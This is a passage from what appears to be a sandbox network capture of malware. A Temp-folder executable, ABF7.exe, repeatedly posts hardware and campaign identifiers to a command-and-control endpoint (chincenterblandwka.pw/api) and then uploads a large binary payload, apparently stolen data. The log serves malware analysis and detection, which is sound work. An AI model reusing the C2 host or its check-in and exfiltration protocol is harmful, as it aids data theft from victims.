2023-12-27 16:58:23 UTC	632	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 37 39 38 44 31 41 33 45 41 41 44 31 33 30 32 39 39 34 31 35 39 39 44 43 42 33 42 41 39 36 34 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 76 42 76 56 39 2d 2d 57 61 6c 6c 65 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"A798D1A3EAAD13029941599DCB3BA964--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"HvBvV9--Walle
2023-12-27 16:58:23 UTC	1329	IN	HTTP/1.1 200 OK Date: Wed, 27 Dec 2023 16:58:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=hth6g1i4ljsmr1cltvkisd4cli; expires=Sun, 21-Apr-2024 10:45:02 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sun, 25-Feb-2024 16:58:23 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_use_round=1; expires=Sun, 25-Feb-2024 16:58:23 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_round_n=2; expires=Sun, 25-Feb-2024 16:58:23 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=anptgcTmSFX3RzYJrrtnqJpMl7iML5kif%2B5bY0ADghSSOdp8p0oTMHFOi3GMr%2BtmC0UBUgGngbC9kL9H5o8PBBd8Up52Fz%2BL2tcvwDjKXzE2DgdMAtGfgGlt3aW%2FTI1INJZA2zRc1y4%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 83c31ba7ae786b91-DFW alt-svc: h3=":443"; ma=86400
2023-12-27 16:58:23 UTC	28	IN	Data Raw: 31 36 0d 0a 44 65 62 75 67 20 64 61 74 61 20 69 73 20 64 69 73 61 62 6c 65 64 0d 0a Data Ascii: 16Debug data is disabled
2023-12-27 16:58:23 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.4	49840	172.67.176.11	443	7832	C:\Users\user\AppData\Local\Temp\ABF7.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-27 16:58:24 UTC	285	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 632 Host: chincenterblandwka.pw
2023-12-27 16:58:24 UTC	632	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 37 39 38 44 31 41 33 45 41 41 44 31 33 30 32 39 39 34 31 35 39 39 44 43 42 33 42 41 39 36 34 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 76 42 76 56 39 2d 2d 57 61 6c 6c 65 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"A798D1A3EAAD13029941599DCB3BA964--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"HvBvV9--Walle
2023-12-27 16:58:24 UTC	1329	IN	HTTP/1.1 200 OK Date: Wed, 27 Dec 2023 16:58:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=tdkicomu30bf3idbkeio4edti4; expires=Sun, 21-Apr-2024 10:45:03 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sun, 25-Feb-2024 16:58:24 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_use_round=1; expires=Sun, 25-Feb-2024 16:58:24 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_round_n=2; expires=Sun, 25-Feb-2024 16:58:24 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=GW4bpEw6Y1SWANK1R9UG0I%2FYLA8KKMksqbSWzlKY1XhVU7PXayIhgjuLAmVQ3149kOiCoF53jx%2Ffi9YVzj1BA0TSn0jjXofXJTn6KUd1FBpQm%2Bmskc3s0VvL0wvXBOV8n2mT%2BCcGvfk%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 83c31baf3d39e97a-DFW alt-svc: h3=":443"; ma=86400
2023-12-27 16:58:24 UTC	28	IN	Data Raw: 31 36 0d 0a 44 65 62 75 67 20 64 61 74 61 20 69 73 20 64 69 73 61 62 6c 65 64 0d 0a Data Ascii: 16Debug data is disabled
2023-12-27 16:58:24 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.4	49842	172.67.176.11	443	7832	C:\Users\user\AppData\Local\Temp\ABF7.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-27 16:58:25 UTC	285	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 632 Host: chincenterblandwka.pw
2023-12-27 16:58:25 UTC	632	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 37 39 38 44 31 41 33 45 41 41 44 31 33 30 32 39 39 34 31 35 39 39 44 43 42 33 42 41 39 36 34 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 76 42 76 56 39 2d 2d 57 61 6c 6c 65 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"A798D1A3EAAD13029941599DCB3BA964--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"HvBvV9--Walle
2023-12-27 16:58:26 UTC	1331	IN	HTTP/1.1 200 OK Date: Wed, 27 Dec 2023 16:58:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=33qp3ke1mphuvb9ht7sncei9h7; expires=Sun, 21-Apr-2024 10:45:04 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sun, 25-Feb-2024 16:58:25 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_use_round=1; expires=Sun, 25-Feb-2024 16:58:25 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_round_n=2; expires=Sun, 25-Feb-2024 16:58:25 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=EolxLi%2FalPv%2B4ZCXcWZmBnQ3br8kJOivt2Ea61G5CZllZULCt7Qlk7fh3WRK7bYGsg%2FaUpXmHoAOWSblWrtrhqJny2DguUMxXRqrQNgzO%2BIx2WXKVCU0XK5Dld9J8gCxu%2BgYlE1nODM%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 83c31bb66cdee85f-DFW alt-svc: h3=":443"; ma=86400
2023-12-27 16:58:26 UTC	28	IN	Data Raw: 31 36 0d 0a 44 65 62 75 67 20 64 61 74 61 20 69 73 20 64 69 73 61 62 6c 65 64 0d 0a Data Ascii: 16Debug data is disabled
2023-12-27 16:58:26 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.4	49844	172.67.176.11	443	7832	C:\Users\user\AppData\Local\Temp\ABF7.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-27 16:58:26 UTC	285	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 632 Host: chincenterblandwka.pw
2023-12-27 16:58:26 UTC	632	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 37 39 38 44 31 41 33 45 41 41 44 31 33 30 32 39 39 34 31 35 39 39 44 43 42 33 42 41 39 36 34 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 76 42 76 56 39 2d 2d 57 61 6c 6c 65 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"A798D1A3EAAD13029941599DCB3BA964--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"HvBvV9--Walle
2023-12-27 16:58:27 UTC	1331	IN	HTTP/1.1 200 OK Date: Wed, 27 Dec 2023 16:58:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=1k9tm9qlq00rhpuqnn1nbh5b79; expires=Sun, 21-Apr-2024 10:45:06 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sun, 25-Feb-2024 16:58:27 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_use_round=1; expires=Sun, 25-Feb-2024 16:58:27 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_round_n=2; expires=Sun, 25-Feb-2024 16:58:27 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=UparoUnMN3ZcLL7jGsv8M4mcwn8kSjfMk3UXlRRerY3amXt9eNCc6XUkLDMZM0sT%2BpqdKMnuDkrc%2Fye0cu9u9saG8gqK17MsMXvG%2B%2BYgQCFy1ysS7OhIs3TBP0TP7cELK6gp%2BVFepCg%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 83c31bbdcd602cdc-DFW alt-svc: h3=":443"; ma=86400
2023-12-27 16:58:27 UTC	28	IN	Data Raw: 31 36 0d 0a 44 65 62 75 67 20 64 61 74 61 20 69 73 20 64 69 73 61 62 6c 65 64 0d 0a Data Ascii: 16Debug data is disabled
2023-12-27 16:58:27 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.4	49848	172.67.176.11	443	7832	C:\Users\user\AppData\Local\Temp\ABF7.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-27 16:58:30 UTC	286	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 7091 Host: chincenterblandwka.pw
2023-12-27 16:58:30 UTC	7091	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 37 39 38 44 31 41 33 45 41 41 44 31 33 30 32 39 39 34 31 35 39 39 44 43 42 33 42 41 39 36 34 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 76 42 76 56 39 2d 2d 57 61 6c 6c 65 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"A798D1A3EAAD13029941599DCB3BA964--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"HvBvV9--Walle
2023-12-27 16:58:31 UTC	1333	IN	HTTP/1.1 200 OK Date: Wed, 27 Dec 2023 16:58:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=428v0h01767li1d421n0p1i3ok; expires=Sun, 21-Apr-2024 10:45:10 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sun, 25-Feb-2024 16:58:31 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_use_round=1; expires=Sun, 25-Feb-2024 16:58:31 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_round_n=2; expires=Sun, 25-Feb-2024 16:58:31 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=WgkaU5HWZ%2Frxe8cgu9JXzAz5gUNWNzyGMW9OkrUFPM3pHuoXB%2BsQX6dX%2BSX6ZA1sl8iFekWlE6bgM1z%2BxZqoxoxFWuCRuTA8k%2FZQ8R3lSkXthFktUGddTqtwNlPtIjBlQ5BXtpbf%2F5o%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 83c31bd59daf6c4a-DFW alt-svc: h3=":443"; ma=86400
2023-12-27 16:58:31 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 32 31 32 2e 31 30 32 2e 34 31 2e 32 0d 0a Data Ascii: fok 212.102.41.2
2023-12-27 16:58:31 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.4	49849	172.67.176.11	443	7832	C:\Users\user\AppData\Local\Temp\ABF7.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-27 16:58:31 UTC	285	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 814 Host: chincenterblandwka.pw
2023-12-27 16:58:31 UTC	814	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 37 39 38 44 31 41 33 45 41 41 44 31 33 30 32 39 39 34 31 35 39 39 44 43 42 33 42 41 39 36 34 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 76 42 76 56 39 2d 2d 57 61 6c 6c 65 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"A798D1A3EAAD13029941599DCB3BA964--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"HvBvV9--Walle
2023-12-27 16:58:32 UTC	1325	IN	HTTP/1.1 200 OK Date: Wed, 27 Dec 2023 16:58:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=553i7e4fe9du661r9re0i96qtc; expires=Sun, 21-Apr-2024 10:45:11 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sun, 25-Feb-2024 16:58:32 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_use_round=1; expires=Sun, 25-Feb-2024 16:58:32 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_round_n=2; expires=Sun, 25-Feb-2024 16:58:32 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=5qnP6OUTTVAOr0lXhiGU6L1vBbp7tAhCAmWCWLwL3xItvYjNZC4uEGC7%2F2vTq9vvh0awYTFUwBcbU3OVm0UsxNHeudz8FTj3nFPibIHxDkjf4Ruz9d%2FlZRKc3aqoVwRd4jrCcYqc3lI%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 83c31bdcfbbcaa8e-DFW alt-svc: h3=":443"; ma=86400
2023-12-27 16:58:32 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 32 31 32 2e 31 30 32 2e 34 31 2e 32 0d 0a Data Ascii: fok 212.102.41.2
2023-12-27 16:58:32 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.4	49850	172.67.176.11	443	7832	C:\Users\user\AppData\Local\Temp\ABF7.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-27 16:58:37 UTC	288	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 425582 Host: chincenterblandwka.pw
2023-12-27 16:58:37 UTC	15331	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 37 39 38 44 31 41 33 45 41 41 44 31 33 30 32 39 39 34 31 35 39 39 44 43 42 33 42 41 39 36 34 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 76 42 76 56 39 2d 2d 57 61 6c 6c 65 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"A798D1A3EAAD13029941599DCB3BA964--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"HvBvV9--Walle
2023-12-27 16:58:37 UTC	15331	OUT	Data Raw: 4a 17 88 8e 28 33 52 1b ab 44 6e 77 c1 d5 76 23 c3 c9 14 20 96 cd 5f bf 47 63 24 9c 11 46 01 e8 c3 ef 15 0e 62 ce a4 5a a5 c7 4d 5e 8a 6c c4 f1 d6 8a 71 12 e4 96 47 4d ea 66 91 7e 31 c1 19 2c 4b ac d5 3e 3c 94 63 66 62 80 f5 56 94 63 8a b3 b0 d0 31 ee 5b ad fb be 2e 16 a1 3b 91 7b a7 90 60 b7 c8 95 25 0c 4c 70 8e 54 42 c3 03 dc 9f 0f cf b6 7d 5c d4 b0 a9 f4 2e 0a 6b e4 30 87 a5 3d 51 20 62 be 25 2f 54 7c bc d7 00 48 b1 46 66 0e d6 6e 6f ce d6 53 7c 34 f4 db cc 69 ea 02 19 95 c0 5c 81 e9 7e 43 81 69 69 13 a6 99 85 e4 3b 68 71 79 dd 72 cc ac 67 17 59 10 a3 48 a6 7e 82 d9 61 b8 c8 cb 29 8e e8 9d 3f a8 c4 ab 9c b3 ef 90 5d a8 65 f6 c7 b9 29 75 dc ca 07 cc cd 8f 17 26 89 59 da f6 61 79 94 c5 fb 69 f6 e3 2c ee af 82 21 be 29 92 b6 13 16 9e fc d5 51 f4 7d 27 3c Data Ascii: J(3RDnwv# _Gc$FbZM^lqGMf~1,K><cfbVc1[.;{`%LpTB}\.k0=Q b%/T\|HFfnoS\|4i\~Cii;hqyrgYH~a)?]e)u&Yayi,!)Q}'<
2023-12-27 16:58:37 UTC	15331	OUT	Data Raw: df 81 b3 a6 a1 60 75 64 a4 20 7c 51 66 fe fc 3e b2 d8 e2 e1 7d 04 ba 1c eb aa 54 fa 21 53 be bd ec 09 ed 65 e4 3e 4d d1 12 f7 ec 95 b8 ae 10 19 50 5f c5 9b 52 fc b0 02 05 c8 f0 3d 5d de 51 83 c4 63 e1 77 99 a9 9d b6 a3 78 c7 18 cb ad 45 a4 ef e8 56 f9 91 28 9c 84 00 ee 54 79 44 36 d8 96 ea 6c 50 6a 3b e6 48 73 73 be 33 23 93 28 ed 3b 55 66 92 4b 2e 3a e5 bf 5f 92 bb e4 d7 13 d9 c6 9a 76 22 b5 8b 7b a1 81 6e ff 0d 17 40 8d 5f 39 3c e1 e9 18 0d fd 9a 5a 8d a6 14 5a 1b 2b 0a 2e 62 b7 7a 8e c5 7b 50 f8 68 a0 4e 35 68 6b ff ea 67 29 c5 b8 9d cd a5 be 6e ce 1f 93 89 99 ba d7 73 5c 0b d0 e9 1d da b7 13 83 4c 1b 54 d2 21 c3 16 3f 69 6c ff 59 f1 42 89 c6 4f f2 31 ee d9 87 f6 36 9a 55 09 87 22 a4 35 52 15 ff fe 14 f1 63 ca 51 8d d5 36 c1 f3 cd f4 e3 f5 49 66 98 93 Data Ascii: `ud \|Qf>}T!Se>MP_R=]QcwxEV(TyD6lPj;Hss3#(;UfK.:_v"{n@_9<ZZ+.bz{PhN5hkg)ns\LT!?ilYBO16U"5RcQ6If
